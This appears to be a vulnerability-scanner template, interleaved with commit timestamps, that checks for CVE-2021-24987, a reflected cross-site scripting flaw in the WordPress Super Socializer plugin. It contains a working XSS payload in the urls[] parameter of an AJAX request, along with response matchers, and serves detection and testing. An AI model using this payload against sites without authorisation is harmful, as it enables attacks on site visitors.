2022-04-15 13:50:49 +00:00
id : CVE-2021-24987
info :
2022-08-29 13:55:23 +00:00
name : WordPress Super Socializer <7.13.30 - Cross-Site Scripting
2022-04-15 13:50:49 +00:00
author : Akincibor
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.
2022-04-15 14:40:28 +00:00
reference :
- https://wpscan.com/vulnerability/a14b668f-812f-46ee-827e-0996b378f7f0
- https://nvd.nist.gov/vuln/detail/CVE-2021-24987
2022-04-16 13:18:49 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-04-16 13:18:49 +00:00
cve-id : CVE-2021-24987
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,wpscan,xss,wp,wp-plugin,wordpress
2022-04-15 13:50:49 +00:00
requests :
- method : GET
path :
2022-04-15 14:40:28 +00:00
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>'
2022-04-15 13:50:49 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-04-15 14:40:28 +00:00
words :
- '{"facebook_urls":[["<img src=x onerror=alert(document.domain)>"]]'
2022-04-15 13:50:49 +00:00
- type : word
2022-04-15 14:40:28 +00:00
part : header
2022-04-15 13:50:49 +00:00
words :
- "text/html"
2022-04-15 14:40:28 +00:00
- type : status
status :
- 200
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28